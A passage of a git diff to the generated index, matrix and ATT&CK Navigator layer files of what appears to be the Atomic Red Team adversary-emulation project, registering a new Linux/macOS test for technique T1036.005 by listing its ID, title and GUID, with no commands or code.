hniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabl
ed":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techn
iqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":tru
e},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID"
:"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled
":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"
techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"ena
bled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","scor
e":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true
},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index d701f7c6..2c3bac55 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -365,6 +365,7 @@ defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run ex defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt 
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index cd372f79..e3764d6d 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -91,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index e9e50ace..335e60cf 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
@@ -75,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 586ecb2f..2c80658d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -636,7 +636,8 @@ - Atomic Test #2: Creating W32Time similar named service using sc [windows] - [T1036 Masquerading](../../T1036/T1036.md) - Atomic Test #1: System File Copied to Unusual Location [windows] -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1112 Modify Registry](../../T1112/T1112.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 7df32bb9..bbbb7484 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -238,7 +238,8 @@ - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 65e062d0..9253adec 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -203,7 +203,8 @@ - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) - Atomic Test #1: Decode base64 Data into Script [macos, linux] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index a6c4f9c7..e55aedd3 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
@@ -45,7 +45,7 @@ | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | | | | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Timers](../../T1053.006/T1053.006.md) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index 9d447e38..1c1dc3c9 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md 
@@ -39,7 +39,7 @@ | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | | | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | | | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index bdd2eed9..f910d1e7 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
